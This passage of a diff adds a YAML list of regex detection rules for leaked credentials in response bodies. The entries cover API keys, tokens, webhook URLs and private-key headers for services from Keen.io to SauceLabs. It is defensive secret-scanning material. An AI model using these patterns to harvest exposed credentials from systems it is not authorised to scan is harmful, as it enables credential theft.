+ regex:
+ - (?:keen).{0,40}\b([0-9a-z]{24})\b
+ part: body
+ - type: regex
+ name: keenio_2
+ regex:
+ - (?:keen).{0,40}\b([0-9A-Z]{64})\b
+ part: body
+ - type: regex
+ name: kickbox
+ regex:
+ - (?:kickbox).{0,40}\b([a-zA-Z0-9_]+[a-zA-Z0-9]{64})\b
+ part: body
+ - type: regex
+ name: klipfolio
+ regex:
+ - (?:klipfolio).{0,40}\b([0-9a-f]{40})\b
+ part: body
+ - type: regex
+ name: kontent
+ regex:
+ - (?:kontent).{0,40}\b([a-z0-9-]{36})\b
+ part: body
+ - type: regex
+ name: kraken_1
+ regex:
+ - (?:kraken).{0,40}\b([0-9A-Za-z\/\+=]{56}[ "'\r\n]{1})
+ part: body
+ - type: regex
+ name: kraken_2
+ regex:
+ - (?:kraken).{0,40}\b([0-9A-Za-z\/\+=]{86,88}[ "'\r\n]{1})
+ part: body
+ - type: regex
+ name: kucoin_1
+ regex:
+ - (?:kucoin).{0,40}([ \r\n]{1}[!-~]{7,32}[ \r\n]{1})
+ part: body
+ - type: regex
+ name: kucoin_2
+ regex:
+ - >-
+ (?:kucoin).{0,40}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b
+ part: body
+ - type: regex
+ name: kucoin_3
+ regex:
+ - (?:kucoin).{0,40}\b([0-9a-f]{24})\b
+ part: body
+ - type: regex
+ name: kylas
+ regex:
+ - (?:kylas).{0,40}\b([a-z0-9-]{36})\b
+ part: body
+ - type: regex
+ name: languagelayer
+ regex:
+ - (?:languagelayer).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: lastfm
+ regex:
+ - (?:lastfm).{0,40}\b([0-9a-z]{32})\b
+ part: body
+ - type: regex
+ name: launchdarkly
+ regex:
+ - (?:launchdarkly).{0,40}\b([a-z0-9-]{40})\b
+ part: body
+ - type: regex
+ name: leadfeeder
+ regex:
+ - (?:leadfeeder).{0,40}\b([a-zA-Z0-9-]{43})\b
+ part: body
+ - type: regex
+ name: lendflow
+ regex:
+ - >-
+ (?:lendflow).{0,40}\b([a-zA-Z0-9]{36}\.[a-zA-Z0-9]{235}\.[a-zA-Z0-9]{32}\-[a-zA-Z0-9]{47}\-[a-zA-Z0-9_]{162}\-[a-zA-Z0-9]{42}\-[a-zA-Z0-9_]{40}\-[a-zA-Z0-9_]{66}\-[a-zA-Z0-9_]{59}\-[a-zA-Z0-9]{7}\-[a-zA-Z0-9_]{220})\b
+ part: body
+ - type: regex
+ name: lexigram
+ regex:
+ - (?:lexigram).{0,40}\b([a-zA-Z0-9\S]{301})\b
+ part: body
+ - type: regex
+ name: linearapi
+ regex:
+ - \b(lin_api_[0-9A-Za-z]{40})\b
+ part: body
+ - type: regex
+ name: linemessaging
+ regex:
+ - (?:line).{0,40}\b([A-Za-z0-9+/]{171,172})\b
+ part: body
+ - type: regex
+ name: linenotify
+ regex:
+ - (?:linenotify).{0,40}\b([0-9A-Za-z]{43})\b
+ part: body
+ - type: regex
+ name: linkpreview
+ regex:
+ - (?:linkpreview).{0,40}\b([a-zA-Z0-9]{32})\b
+ part: body
+ - type: regex
+ name: liveagent
+ regex:
+ - (?:liveagent).{0,40}\b([a-zA-Z0-9]{32})\b
+ part: body
+ - type: regex
+ name: livestorm
+ regex:
+ - >-
+ (?:livestorm).{0,40}\b(eyJhbGciOiJIUzI1NiJ9\.eyJhdWQiOiJhcGkubGl2ZXN0b3JtLmNvIiwianRpIjoi[0-9A-Z-a-z]{134}\.[0-9A-Za-z\-\_]{43}[
+ \r\n]{1})
+ part: body
+ - type: regex
+ name: locationiq
+ regex:
+ - \b(pk\.[a-zA-Z-0-9]{32})\b
+ part: body
+ - type: regex
+ name: loginradius
+ regex:
+ - >-
+ (?:loginradius).{0,40}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b
+ part: body
+ - type: regex
+ name: lokalisetoken
+ regex:
+ - (?:lokalise).{0,40}\b([a-z0-9]{40})\b
+ part: body
+ - type: regex
+ name: loyverse
+ regex:
+ - (?:loyverse).{0,40}\b([0-9-a-z]{32})\b
+ part: body
+ - type: regex
+ name: luno_1
+ regex:
+ - (?:luno).{0,40}\b([a-z0-9]{13})\b
+ part: body
+ - type: regex
+ name: luno_2
+ regex:
+ - (?:luno).{0,40}\b([a-zA-Z0-9_-]{43})\b
+ part: body
+ - type: regex
+ name: macaddress
+ regex:
+ - (?:macaddress).{0,40}\b([a-zA-Z0-9_]{32})\b
+ part: body
+ - type: regex
+ name: madkudu
+ regex:
+ - (?:madkudu).{0,40}\b([0-9a-f]{32})\b
+ part: body
+ - type: regex
+ name: magnetic
+ regex:
+ - >-
+ (?:magnetic).{0,40}\b([0-9Aa-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b
+ part: body
+ - type: regex
+ name: mailchimp_api_key
+ regex:
+ - '[0-9a-f]{32}-us[0-9]{1,2}'
+ part: body
+ - type: regex
+ name: mailboxlayer
+ regex:
+ - (?:mailboxlayer).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: mailerlite
+ regex:
+ - (?:mailerlite).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: mailgun_2
+ regex:
+ - (?:mailgun).{0,40}\b([a-zA-Z-0-9]{72})\b
+ part: body
+ - type: regex
+ name: mailgun_api_key_1
+ regex:
+ - key-[0-9a-zA-Z]{32}
+ part: body
+ - type: regex
+ name: mailjetbasicauth
+ regex:
+ - (?:mailjet).{0,40}\b([A-Za-z0-9]{87}\=)
+ part: body
+ - type: regex
+ name: mailjetsms
+ regex:
+ - (?:mailjet).{0,40}\b([A-Za-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: mailmodo
+ regex:
+ - >-
+ (?:mailmodo).{0,40}\b([A-Z0-9]{7}-[A-Z0-9]{7}-[A-Z0-9]{7}-[A-Z0-9]{7})\b
+ part: body
+ - type: regex
+ name: mailsac
+ regex:
+ - (?:mailsac).{0,40}\b(k_[0-9A-Za-z]{36,})\b
+ part: body
+ - type: regex
+ name: mandrill
+ regex:
+ - (?:mandrill).{0,40}\b([A-Za-z0-9_-]{22})\b
+ part: body
+ - type: regex
+ name: mapbox_2
+ regex:
+ - \b(sk\.[a-zA-Z-0-9\.]{80,240})\b
+ part: body
+ - type: regex
+ name: mapquest
+ regex:
+ - (?:mapquest).{0,40}\b([0-9A-Za-z]{32})\b
+ part: body
+ - type: regex
+ name: marketstack
+ regex:
+ - (?:marketstack).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: mattermostpersonaltoken_1
+ regex:
+ - (?:mattermost).{0,40}\b([A-Za-z0-9-_]{1,}.cloud.mattermost.com)\b
+ part: body
+ - type: regex
+ name: mattermostpersonaltoken_2
+ regex:
+ - (?:mattermost).{0,40}\b([a-z0-9]{26})\b
+ part: body
+ - type: regex
+ name: mavenlink
+ regex:
+ - (?:mavenlink).{0,40}\b([0-9a-z]{64})\b
+ part: body
+ - type: regex
+ name: maxmindlicense_1
+ regex:
+ - (?:maxmind|geoip).{0,40}\b([0-9A-Za-z]{16})\b
+ part: body
+ - type: regex
+ name: maxmindlicense_2
+ regex:
+ - (?:maxmind|geoip).{0,40}\b([0-9]{2,7})\b
+ part: body
+ - type: regex
+ name: meaningcloud
+ regex:
+ - (?:meaningcloud).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: mediastack
+ regex:
+ - (?:mediastack).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: meistertask
+ regex:
+ - (?:meistertask).{0,40}\b([a-zA-Z0-9]{43})\b
+ part: body
+ - type: regex
+ name: mesibo
+ regex:
+ - (?:mesibo).{0,40}\b([0-9A-Za-z]{64})\b
+ part: body
+ - type: regex
+ name: messagebird
+ regex:
+ - (?:messagebird).{0,40}\b([A-Za-z0-9_-]{25})\b
+ part: body
+ - type: regex
+ name: metaapi_1
+ regex:
+ - (?:metaapi|meta-api).{0,40}\b([0-9a-f]{64})\b
+ part: body
+ - type: regex
+ name: metaapi_2
+ regex:
+ - (?:metaapi|meta-api).{0,40}\b([0-9a-f]{24})\b
+ part: body
+ - type: regex
+ name: metrilo
+ regex:
+ - (?:metrilo).{0,40}\b([a-z0-9]{16})\b
+ part: body
+ - type: regex
+ name: microsoftteamswebhook
+ regex:
+ - >-
+ (https:\/\/[a-zA-Z-0-9]+\.webhook\.office\.com\/webhookb2\/[a-zA-Z-0-9]{8}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{12}\@[a-zA-Z-0-9]{8}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{12}\/IncomingWebhook\/[a-zA-Z-0-9]{32}\/[a-zA-Z-0-9]{8}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{4}-[a-zA-Z-0-9]{12})
+ part: body
+ - type: regex
+ name: midise
+ regex:
+ - midi-662b69edd2[a-zA-Z0-9]{54}
+ part: body
+ - type: regex
+ name: mindmeister
+ regex:
+ - (?:mindmeister).{0,40}\b([a-zA-Z0-9]{43})\b
+ part: body
+ - type: regex
+ name: mite_1
+ regex:
+ - (?:mite).{0,40}\b([0-9a-z]{16})\b
+ part: body
+ - type: regex
+ name: mite_2
+ regex:
+ - \b([0-9a-z-]{1,}.mite.yo.lk)\b
+ part: body
+ - type: regex
+ name: mixmax
+ regex:
+ - (?:mixmax).{0,40}\b([a-zA-Z0-9_-]{36})\b
+ part: body
+ - type: regex
+ name: mixpanel_1
+ regex:
+ - (?:mixpanel).{0,40}\b([a-zA-Z0-9.-]{30,40})\b
+ part: body
+ - type: regex
+ name: mixpanel_2
+ regex:
+ - (?:mixpanel).{0,40}\b([a-zA-Z0-9-]{32})\b
+ part: body
+ - type: regex
+ name: moderation
+ regex:
+ - >-
+ (?:moderation).{0,40}\b([a-zA-Z0-9]{36}\.[a-zA-Z0-9]{115}\.[a-zA-Z0-9_]{43})\b
+ part: body
+ - type: regex
+ name: monday
+ regex:
+ - (?:monday).{0,40}\b(ey[a-zA-Z0-9_.]{210,225})\b
+ part: body
+ - type: regex
+ name: moonclerck
+ regex:
+ - (?:moonclerck).{0,40}\b([0-9a-z]{32})\b
+ part: body
+ - type: regex
+ name: moonclerk
+ regex:
+ - (?:moonclerk).{0,40}\b([0-9a-z]{32})\b
+ part: body
+ - type: regex
+ name: moosend
+ regex:
+ - >-
+ (?:moosend).{0,40}\b([0-9Aa-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b
+ part: body
+ - type: regex
+ name: mrticktock_1
+ regex:
+ - (?:mrticktock).{0,40}\b([a-zA-Z0-9!=@#$%()_^]{1,50})
+ part: body
+ - type: regex
+ name: myintervals
+ regex:
+ - (?:myintervals).{0,40}\b([0-9a-z]{11})\b
+ part: body
+ - type: regex
+ name: nasdaqdatalink
+ regex:
+ - (?:nasdaq).{0,40}\b([a-zA-Z0-9_-]{20})\b
+ part: body
+ - type: regex
+ name: nethunt_1
+ regex:
+ - (?:nethunt).{0,40}\b([a-zA-Z0-9.-@]{25,30})\b
+ part: body
+ - type: regex
+ name: nethunt_2
+ regex:
+ - (?:nethunt).{0,40}\b([a-z0-9-\S]{36})\b
+ part: body
+ - type: regex
+ name: netlify
+ regex:
+ - (?:netlify).{0,40}\b([A-Za-z0-9_-]{43,45})\b
+ part: body
+ - type: regex
+ name: neutrinoapi_1
+ regex:
+ - (?:neutrinoapi).{0,40}\b([a-zA-Z0-9]{48})\b
+ part: body
+ - type: regex
+ name: neutrinoapi_2
+ regex:
+ - (?:neutrinoapi).{0,40}\b([a-zA-Z0-9]{6,24})\b
+ part: body
+ - type: regex
+ name: newrelic_admin_api_key
+ regex:
+ - NRAA-[a-f0-9]{27}
+ part: body
+ - type: regex
+ name: newrelic_insights_api_key
+ regex:
+ - NRI(?:I|Q)-[A-Za-z0-9\-_]{32}
+ part: body
+ - type: regex
+ name: newrelic_rest_api_key
+ regex:
+ - NRRA-[a-f0-9]{42}
+ part: body
+ - type: regex
+ name: newrelic_synthetics_location_key
+ regex:
+ - NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}
+ part: body
+ - type: regex
+ name: newrelicpersonalapikey
+ regex:
+ - (?:newrelic).{0,40}\b([A-Za-z0-9_\.]{4}-[A-Za-z0-9_\.]{42})\b
+ part: body
+ - type: regex
+ name: newsapi
+ regex:
+ - (?:newsapi).{0,40}\b([a-z0-9]{32})
+ part: body
+ - type: regex
+ name: newscatcher
+ regex:
+ - (?:newscatcher).{0,40}\b([0-9A-Za-z_]{43})\b
+ part: body
+ - type: regex
+ name: nexmoapikey_1
+ regex:
+ - (?:nexmo).{0,40}\b([A-Za-z0-9_-]{8})\b
+ part: body
+ - type: regex
+ name: nexmoapikey_2
+ regex:
+ - (?:nexmo).{0,40}\b([A-Za-z0-9_-]{16})\b
+ part: body
+ - type: regex
+ name: nftport
+ regex:
+ - >-
+ (?:nftport).{0,40}\b([a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12})\b
+ part: body
+ - type: regex
+ name: nicereply
+ regex:
+ - (?:nicereply).{0,40}\b([0-9a-f]{40})\b
+ part: body
+ - type: regex
+ name: nimble
+ regex:
+ - (?:nimble).{0,40}\b([a-zA-Z0-9]{30})\b
+ part: body
+ - type: regex
+ name: nitro
+ regex:
+ - (?:nitro).{0,40}\b([0-9a-f]{32})\b
+ part: body
+ - type: regex
+ name: noticeable
+ regex:
+ - (?:noticeable).{0,40}\b([0-9a-zA-Z]{20})\b
+ part: body
+ - type: regex
+ name: notion
+ regex:
+ - \b(secret_[A-Za-z0-9]{43})\b
+ part: body
+ - type: regex
+ name: nozbeteams
+ regex:
+ - >-
+ (?:nozbe|nozbeteams).{0,40}\b([0-9A-Za-z]{16}_[0-9A-Za-z\-_]{64}[
+ \r\n]{1})
+ part: body
+ - type: regex
+ name: numverify
+ regex:
+ - (?:numverify).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: nutritionix_1
+ regex:
+ - (?:nutritionix).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: nutritionix_2
+ regex:
+ - (?:nutritionix).{0,40}\b([a-z0-9]{8})\b
+ part: body
+ - type: regex
+ name: nylas
+ regex:
+ - (?:nylas).{0,40}\b([0-9A-Za-z]{30})\b
+ part: body
+ - type: regex
+ name: oanda
+ regex:
+ - (?:oanda).{0,40}\b([a-zA-Z0-9]{24})\b
+ part: body
+ - type: regex
+ name: omnisend
+ regex:
+ - (?:omnisend).{0,40}\b([a-z0-9A-Z-]{75})\b
+ part: body
+ - type: regex
+ name: onedesk_1
+ regex:
+ - (?:onedesk).{0,40}\b([a-zA-Z0-9!=@#$%^]{8,64})
+ part: body
+ - type: regex
+ name: onelogin_2
+ regex:
+ - secret[a-zA-Z0-9_' "=]{0,20}([a-z0-9]{64})
+ part: body
+ - type: regex
+ name: onepagecrm_1
+ regex:
+ - (?:onepagecrm).{0,40}\b([a-zA-Z0-9=]{44})
+ part: body
+ - type: regex
+ name: onepagecrm_2
+ regex:
+ - (?:onepagecrm).{0,40}\b([a-z0-9]{24})\b
+ part: body
+ - type: regex
+ name: onwaterio
+ regex:
+ - (?:onwater).{0,40}\b([a-zA-Z0-9_-]{20})\b
+ part: body
+ - type: regex
+ name: oopspam
+ regex:
+ - (?:oopspam).{0,40}\b([a-zA-Z0-9]{40})\b
+ part: body
+ - type: regex
+ name: opencagedata
+ regex:
+ - (?:opencagedata).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: opengraphr
+ regex:
+ - (?:opengraphr).{0,40}\b([0-9Aa-zA-Z]{80})\b
+ part: body
+ - type: regex
+ name: openuv
+ regex:
+ - (?:openuv).{0,40}\b([0-9a-z]{32})\b
+ part: body
+ - type: regex
+ name: openweather
+ regex:
+ - (?:openweather).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: optimizely
+ regex:
+ - (?:optimizely).{0,40}\b([0-9A-Za-z-:]{54})\b
+ part: body
+ - type: regex
+ name: owlbot
+ regex:
+ - (?:owlbot).{0,40}\b([a-z0-9]{40})\b
+ part: body
+ - type: regex
+ name: pgp_private_key_block
+ regex:
+ - '-----BEGIN PGP PRIVATE KEY BLOCK-----'
+ part: body
+ - type: regex
+ name: pagerdutyapikey
+ regex:
+ - >-
+ (?:pagerduty).{0,40}\b([a-z]{1}\+[a-zA-Z]{9}\-[a-z]{2}\-[a-z0-9]{5})\b
+ part: body
+ - type: regex
+ name: pandadoc
+ regex:
+ - (?:pandadoc).{0,40}\b([a-zA-Z0-9]{40})\b
+ part: body
+ - type: regex
+ name: pandascore
+ regex:
+ - (?:pandascore).{0,40}([ \r\n]{0,1}[0-9A-Za-z\-\_]{51}[ \r\n]{1})
+ part: body
+ - type: regex
+ name: paralleldots
+ regex:
+ - (?:paralleldots).{0,40}\b([0-9A-Za-z]{43})\b
+ part: body
+ - type: regex
+ name: partnerstack
+ regex:
+ - (?:partnerstack).{0,40}\b([0-9A-Za-z]{64})\b
+ part: body
+ - type: regex
+ name: passbase
+ regex:
+ - (?:passbase).{0,40}\b([a-zA-Z0-9]{128})\b
+ part: body
+ - type: regex
+ name: password_in_url
+ regex:
+ - '[a-zA-Z]{3,10}://[^/\s:@]{3,20}:[^/\s:@]{3,20}@.{1,100}["''\s]'
+ part: body
+ - type: regex
+ name: pastebin
+ regex:
+ - (?:pastebin).{0,40}\b([a-zA-Z0-9_]{32})\b
+ part: body
+ - type: regex
+ name: paypal_braintree_access_token
+ regex:
+ - access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}
+ part: body
+ - type: regex
+ name: paymoapp
+ regex:
+ - (?:paymoapp).{0,40}\b([a-zA-Z0-9]{44})\b
+ part: body
+ - type: regex
+ name: paymongo
+ regex:
+ - (?:paymongo).{0,40}\b([a-zA-Z0-9_]{32})\b
+ part: body
+ - type: regex
+ name: paystack
+ regex:
+ - \b(sk\_[a-z]{1,}\_[A-Za-z0-9]{40})\b
+ part: body
+ - type: regex
+ name: pdflayer
+ regex:
+ - (?:pdflayer).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: pdfshift
+ regex:
+ - (?:pdfshift).{0,40}\b([0-9a-f]{32})\b
+ part: body
+ - type: regex
+ name: peopledatalabs
+ regex:
+ - (?:peopledatalabs).{0,40}\b([a-z0-9]{64})\b
+ part: body
+ - type: regex
+ name: pepipost
+ regex:
+ - (?:pepipost|netcore).{0,40}\b([a-zA-Z-0-9]{32})\b
+ part: body
+ - type: regex
+ name: picatic_api_key
+ regex:
+ - sk_live_[0-9a-z]{32}
+ part: body
+ - type: regex
+ name: pipedream
+ regex:
+ - (?:pipedream).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: pipedrive
+ regex:
+ - (?:pipedrive).{0,40}\b([a-zA-Z0-9]{40})\b
+ part: body
+ - type: regex
+ name: pivotaltracker
+ regex:
+ - (?:pivotal).{0,40}([a-z0-9]{32})
+ part: body
+ - type: regex
+ name: pixabay
+ regex:
+ - (?:pixabay).{0,40}\b([a-z0-9-]{34})\b
+ part: body
+ - type: regex
+ name: plaidkey_1
+ regex:
+ - (?:plaid).{0,40}\b([a-z0-9]{24})\b
+ part: body
+ - type: regex
+ name: plaidkey_2
+ regex:
+ - (?:plaid).{0,40}\b([a-z0-9]{30})\b
+ part: body
+ - type: regex
+ name: planviewleankit_1
+ regex:
+ - (?:planviewleankit|planview).{0,40}\b([0-9a-f]{128})\b
+ part: body
+ - type: regex
+ name: planviewleankit_2
+ regex:
+ - >-
+ (?:planviewleankit|planview).{0,40}(?:subdomain).\b([a-zA-Z][a-zA-Z0-9.-]{1,23}[a-zA-Z0-9])\b
+ part: body
+ - type: regex
+ name: planyo
+ regex:
+ - (?:planyo).{0,40}\b([0-9a-z]{62})\b
+ part: body
+ - type: regex
+ name: plivo_1
+ regex:
+ - (?:plivo).{0,40}\b([A-Za-z0-9_-]{40})\b
+ part: body
+ - type: regex
+ name: plivo_2
+ regex:
+ - (?:plivo).{0,40}\b([A-Z]{20})\b
+ part: body
+ - type: regex
+ name: poloniex_1
+ regex:
+ - (?:poloniex).{0,40}\b([0-9a-f]{128})\b
+ part: body
+ - type: regex
+ name: poloniex_2
+ regex:
+ - >-
+ (?:poloniex).{0,40}\b([0-9A-Z]{8}-[0-9A-Z]{8}-[0-9A-Z]{8}-[0-9A-Z]{8})\b
+ part: body
+ - type: regex
+ name: polygon
+ regex:
+ - (?:polygon).{0,40}\b([a-z0-9A-Z]{32})\b
+ part: body
+ - type: regex
+ name: positionstack
+ regex:
+ - (?:positionstack).{0,40}\b([a-zA-Z0-9_]{32})\b
+ part: body
+ - type: regex
+ name: postageapp
+ regex:
+ - (?:postageapp).{0,40}\b([0-9A-Za-z]{32})\b
+ part: body
+ - type: regex
+ name: posthog
+ regex:
+ - \b(phc_[a-zA-Z0-9_]{43})\b
+ part: body
+ - type: regex
+ name: postman
+ regex:
+ - \b(PMAK-[a-zA-Z-0-9]{59})\b
+ part: body
+ - type: regex
+ name: postmark
+ regex:
+ - >-
+ (?:postmark).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b
+ part: body
+ - type: regex
+ name: powrbot
+ regex:
+ - (?:powrbot).{0,40}\b([a-z0-9A-Z]{40})\b
+ part: body
+ - type: regex
+ name: privatekey
+ regex:
+ - >-
+ -----\s*?BEGIN[ A-Z0-9_-]*?PRIVATE KEY\s*?-----[\s\S]*?----\s*?END[
+ A-Z0-9_-]*? PRIVATE KEY\s*?-----
+ part: body
+ - type: regex
+ name: prospectcrm
+ regex:
+ - (?:prospect).{0,40}\b([a-z0-9-]{32})\b
+ part: body
+ - type: regex
+ name: prospectio
+ regex:
+ - (?:prospect).{0,40}\b([a-z0-9A-Z-]{50})\b
+ part: body
+ - type: regex
+ name: protocolsio
+ regex:
+ - (?:protocols).{0,40}\b([a-z0-9]{64})\b
+ part: body
+ - type: regex
+ name: proxycrawl
+ regex:
+ - (?:proxycrawl).{0,40}\b([a-zA-Z0-9_]{22})\b
+ part: body
+ - type: regex
+ name: pubnubpublishkey_1
+ regex:
+ - >-
+ \b(sub-c-[0-9a-z]{8}-[a-z]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12})\b
+ part: body
+ - type: regex
+ name: pubnubpublishkey_2
+ regex:
+ - >-
+ \b(pub-c-[0-9a-z]{8}-[0-9a-z]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12})\b
+ part: body
+ - type: regex
+ name: purestake
+ regex:
+ - (?:purestake).{0,40}\b([a-zA-Z0-9]{40})\b
+ part: body
+ - type: regex
+ name: pushbulletapikey
+ regex:
+ - (?:pushbullet).{0,40}\b([A-Za-z0-9_\.]{34})\b
+ part: body
+ - type: regex
+ name: pusherchannelkey_2
+ regex:
+ - (?:pusher).{0,40}\b([a-z0-9]{20})\b
+ part: body
+ - type: regex
+ name: pusherchannelkey_3
+ regex:
+ - (?:pusher).{0,40}\b([0-9]{7})\b
+ part: body
+ - type: regex
+ name: pypi_upload_token
+ regex:
+ - pypi-AgEIcHlwaS5vcmc[A-Za-z0-9-_]{50,1000}
+ part: body
+ - type: regex
+ name: qualaroo
+ regex:
+ - (?:qualaroo).{0,40}\b([a-z0-9A-Z=]{64})
+ part: body
+ - type: regex
+ name: qubole
+ regex:
+ - (?:qubole).{0,40}\b([0-9a-z]{64})\b
+ part: body
+ - type: regex
+ name: quickmetrics
+ regex:
+ - (?:quickmetrics).{0,40}\b([a-zA-Z0-9_-]{22})\b
+ part: body
+ - type: regex
+ name: rkcs8
+ regex:
+ - '-----BEGIN PRIVATE KEY-----'
+ part: body
+ - type: regex
+ name: rsa_private_key
+ regex:
+ - '-----BEGIN RSA PRIVATE KEY-----'
+ part: body
+ - type: regex
+ name: rapidapi
+ regex:
+ - (?:rapidapi).{0,40}\b([A-Za-z0-9_-]{50})\b
+ part: body
+ - type: regex
+ name: raven
+ regex:
+ - (?:raven).{0,40}\b([A-Z0-9-]{16})\b
+ part: body
+ - type: regex
+ name: rawg
+ regex:
+ - (?:rawg).{0,40}\b([0-9Aa-z]{32})\b
+ part: body
+ - type: regex
+ name: razorpay_1
+ regex:
+ - \brzp_\w{2,6}_\w{10,20}\b
+ part: body
+ - type: regex
+ name: readme
+ regex:
+ - (?:readme).{0,40}\b([a-zA-Z0-9_]{32})\b
+ part: body
+ - type: regex
+ name: reallysimplesystems
+ regex:
+ - \b(ey[a-zA-Z0-9-._]{153}.ey[a-zA-Z0-9-._]{916,1000})\b
+ part: body
+ - type: regex
+ name: rebrandly
+ regex:
+ - (?:rebrandly).{0,40}\b([a-zA-Z0-9_]{32})\b
+ part: body
+ - type: regex
+ name: refiner
+ regex:
+ - >-
+ (?:refiner).{0,40}\b([0-9Aa-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b
+ part: body
+ - type: regex
+ name: repairshopr_1
+ regex:
+ - (?:repairshopr).{0,40}\b([a-zA-Z0-9_.!+$#^*]{3,32})\b
+ part: body
+ - type: regex
+ name: repairshopr_2
+ regex:
+ - (?:repairshopr).{0,40}\b([a-zA-Z0-9-]{51})\b
+ part: body
+ - type: regex
+ name: restpack
+ regex:
+ - (?:restpack).{0,40}\b([a-zA-Z0-9]{48})\b
+ part: body
+ - type: regex
+ name: restpackhtmltopdfapi
+ regex:
+ - (?:restpack).{0,40}\b([0-9A-Za-z]{48})\b
+ part: body
+ - type: regex
+ name: rev_1
+ regex:
+ - (?:rev).{0,40}\b([0-9a-zA-Z\/\+]{27}\=[ \r\n]{1})
+ part: body
+ - type: regex
+ name: revampcrm_1
+ regex:
+ - (?:revamp).{0,40}\b([a-zA-Z0-9]{40}\b)
+ part: body
+ - type: regex
+ name: ringcentral_1
+ regex:
+ - (?:ringcentral).{0,40}\b(https://www.[0-9A-Za-z_-]{1,}.com)\b
+ part: body
+ - type: regex
+ name: ringcentral_2
+ regex:
+ - (?:ringcentral).{0,40}\b([0-9A-Za-z_-]{22})\b
+ part: body
+ - type: regex
+ name: ritekit
+ regex:
+ - (?:ritekit).{0,40}\b([0-9a-f]{44})\b
+ part: body
+ - type: regex
+ name: roaring
+ regex:
+ - (?:roaring).{0,40}\b([0-9A-Za-z_-]{28})\b
+ part: body
+ - type: regex
+ name: rocketreach
+ regex:
+ - (?:rocketreach).{0,40}\b([a-z0-9-]{39})\b
+ part: body
+ - type: regex
+ name: roninapp_2
+ regex:
+ - (?:ronin).{0,40}\b([0-9a-zA-Z]{26})\b
+ part: body
+ - type: regex
+ name: route4me
+ regex:
+ - (?:route4me).{0,40}\b([0-9A-Z]{32})\b
+ part: body
+ - type: regex
+ name: rownd_1
+ regex:
+ - >-
+ (?:rownd).{0,40}\b([a-z0-9]{8}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{12})\b
+ part: body
+ - type: regex
+ name: rownd_2
+ regex:
+ - (?:rownd).{0,40}\b([a-z0-9]{48})\b
+ part: body
+ - type: regex
+ name: rownd_3
+ regex:
+ - (?:rownd).{0,40}\b([0-9]{18})\b
+ part: body
+ - type: regex
+ name: rubygems
+ regex:
+ - \b(rubygems_[a-zA0-9]{48})\b
+ part: body
+ - type: regex
+ name: runrunit_1
+ regex:
+ - (?:runrunit).{0,40}\b([0-9a-f]{32})\b
+ part: body
+ - type: regex
+ name: runrunit_2
+ regex:
+ - (?:runrunit).{0,40}\b([0-9A-Za-z]{18,20})\b
+ part: body
+ - type: regex
+ name: ssh
+ regex:
+ - '-----BEGIN OPENSSH PRIVATE KEY-----'
+ part: body
+ - type: regex
+ name: ssh_dsa_private_key
+ regex:
+ - '-----BEGIN DSA PRIVATE KEY-----'
+ part: body
+ - type: regex
+ name: salesblink
+ regex:
+ - (?:salesblink).{0,40}\b([a-zA-Z]{16})\b
+ part: body
+ - type: regex
+ name: salescookie
+ regex:
+ - (?:salescookie).{0,40}\b([a-zA-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: salesflare
+ regex:
+ - (?:salesflare).{0,40}\b([a-zA-Z0-9_]{45})\b
+ part: body
+ - type: regex
+ name: satismeterprojectkey_1
+ regex:
+ - >-
+ (?:satismeter).{0,40}\b([a-zA-Z0-9]{4,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,12})\b
+ part: body
+ - type: regex
+ name: satismeterprojectkey_2
+ regex:
+ - (?:satismeter).{0,40}\b([a-zA-Z0-9]{24})\b
+ part: body
+ - type: regex
+ name: satismeterprojectkey_3
+ regex:
+ - (?:satismeter).{0,40}\b([a-zA-Z0-9!=@#$%^]{6,32})
+ part: body
+ - type: regex
+ name: satismeterwritekey
+ regex:
+ - (?:satismeter).{0,40}\b([a-z0-9A-Z]{16})\b
+ part: body
+ - type: regex
+ name: saucelabs_1
+ regex:
+ - \b(oauth\-[a-z0-9]{8,}\-[a-z0-9]{5})\b
+ part: body
+ - type: regex
+ name: saucelabs_2
+ regex:
+ - >-
